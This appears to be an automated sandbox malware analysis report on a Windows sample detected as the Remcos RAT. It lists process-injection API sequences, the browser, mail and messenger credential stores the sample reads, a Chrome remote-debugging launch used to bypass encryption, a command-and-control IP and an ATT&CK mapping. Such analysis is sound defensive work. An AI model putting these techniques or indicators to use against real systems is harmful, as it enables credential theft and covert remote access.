                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00434178 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00434178
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043A66D
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00433B54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00433B54
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00433CE7 SetUnhandledExceptionFilter,0_2_00433CE7
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_028360E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_028360E2
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_02832639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_02832639
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_02832B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_02832B1C
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_1000B299 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_1000B299
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_1000D8D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_1000D8D1
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_1000AFD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_1000AFD4

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Contains functionality to inject code into remote processes
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,0_2_00417245
                      Maps a DLL or memory area into another process
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonlyJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe0_2_00410F36
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00418764 mouse_event,0_2_00418764
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess created: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\djdxhsukiioozpxia"Jump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess created: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\fliqhlfdwqgtkvturvhs"Jump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess created: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\qgniidqfkyyfmjhyagcumhn"Jump to behavior
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000002.4573276509.0000000003398000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000002.4573276509.0000000003398000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager,
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000002.4568387682.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2147322433.0000000000820000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000002.4573276509.0000000003398000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager:
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00433E1A cpuid 0_2_00433E1A
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: GetLocaleInfoA,0_2_0040E679
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: GetLocaleInfoW,0_2_004510CA
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_004470BE
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_004511F3
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: GetLocaleInfoW,0_2_004512FA
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_004513C7
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: GetLocaleInfoW,0_2_004475A7
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00450A8F
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_00450D52
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_00450D07
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_00450DED
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00450E7A
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00404915 GetLocalTime,CreateEventA,CreateThread,0_2_00404915
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0041A7B2 GetComputerNameExW,GetUserNameW,0_2_0041A7B2
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0044801F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0044801F
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_0041739B GetVersionExW,4_2_0041739B
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.4568387682.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.2113712556.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.2148421587.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.2147746158.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe PID: 1220, type: MEMORYSTR
                      Contains functionality to steal Chrome passwords or cookies
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data0_2_0040B21B
                      Contains functionality to steal Firefox passwords or cookies
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\0_2_0040B335
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: \key3.db0_2_0040B335
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Tries to steal Instant Messenger accounts or passwords
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                      Tries to steal Mail credentials (via file registry)
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: ESMTPPassword5_2_004033F0
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword5_2_00402DB3
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword5_2_00402DB3
                      Yara detected WebBrowserPassView password recovery tool
                      Source: Yara matchFile source: Process Memory Space: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe PID: 1220, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Attempt to bypass Chrome Application-Bound Encryption
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.4568387682.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.2113712556.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.2148421587.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.2147746158.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe PID: 1220, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: cmd.exe0_2_00405042

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                      Native API                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Deobfuscate/Decode Files or Information                      		2
                      OS Credential Dumping                      		2
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		12
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts13
                      Command and Scripting Interpreter                      		1
                      Windows Service                      		1
                      Bypass User Account Control                      		2
                      Obfuscated Files or Information                      		111
                      Input Capture                      		1
                      Account Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		21
                      Encrypted Channel                      		Exfiltration Over Bluetooth1
                      Defacement
                      Email AddressesDNS ServerDomain Accounts2
                      Service Execution                      		Logon Script (Windows)1
                      Extra Window Memory Injection                      		1
                      Software Packing                      		2
                      Credentials in Registry                      		1
                      System Service Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      Access Token Manipulation                      		1
                      DLL Side-Loading                      		3
                      Credentials In Files                      		3
                      File and Directory Discovery                      		Distributed Component Object Model111
                      Input Capture                      		1
                      Remote Access Software                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                      Windows Service                      		1
                      Bypass User Account Control                      		LSA Secrets38
                      System Information Discovery                      		SSH3
                      Clipboard Data                      		3
                      Non-Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts222
                      Process Injection                      		1
                      Extra Window Memory Injection                      		Cached Domain Credentials31
                      Security Software Discovery                      		VNCGUI Input Capture14
                      Application Layer Protocol                      		Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Masquerading                      		DCSync1
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Virtualization/Sandbox Evasion                      		Proc Filesystem4
                      Process Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Access Token Manipulation                      		/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron222
                      Process Injection                      		Network Sniffing1
                      System Owner/User Discovery                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584334 Sample: 17360626254f6ab0798f0d71fe8... Startdate: 05/01/2025 Architecture: WINDOWS Score: 100 44 geoplugin.net 2->44 62 Suricata IDS alerts for network traffic 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 8 other signatures 2->68 8 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe 3 26 2->8         started        12 msedge.exe 66 416 2->12         started        signatures3 process4 dnsIp5 56 195.133.78.18, 49709, 49710, 49711 FLEX-ASRU Russian Federation 8->56 58 geoplugin.net 178.237.33.50, 49712, 80 ATOM86-ASATOM86NL Netherlands 8->58 60 127.0.0.1 unknown unknown 8->60 70 Contains functionality to bypass UAC (CMSTPLUA) 8->70 72 Detected unpacking (changes PE section rights) 8->72 74 Attempt to bypass Chrome Application-Bound Encryption 8->74 78 8 other signatures 8->78 14 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe 1 8->14         started        17 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe 1 8->17         started        19 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe 2 8->19         started        29 2 other processes 8->29 76 Maps a DLL or memory area into another process 12->76 21 msedge.exe 12->21         started        25 msedge.exe 12->25         started        27 msedge.exe 12->27         started        31 2 other processes 12->31 signatures6 process7 dnsIp8 80 Tries to steal Instant Messenger accounts or passwords 14->80 82 Tries to steal Mail credentials (via file / registry access) 14->82 84 Tries to harvest and steal browser information (history, passwords, etc) 17->84 46 20.110.205.119, 443, 49861 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 21->46 48 204.79.197.237, 443, 49862 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 21->48 54 17 other IPs or domains 21->54 38 C:\Users\user\AppData\Local\...\Cookies, SQLite 21->38 dropped 50 192.168.2.6, 138, 443, 49703 unknown unknown 29->50 52 239.255.255.250 unknown Reserved 29->52 33 chrome.exe 29->33         started        36 msedge.exe 29->36         started        file9 signatures10 process11 dnsIp12 40 googlehosted.l.googleusercontent.com 142.250.185.129, 443, 49728 GOOGLEUS United States 33->40 42 clients2.googleusercontent.com 33->42

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe75%VirustotalBrowse
                      17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe71%ReversingLabsWin32.Backdoor.Remcos
                      17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe100%AviraBDS/Backdoor.Gen
                      17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
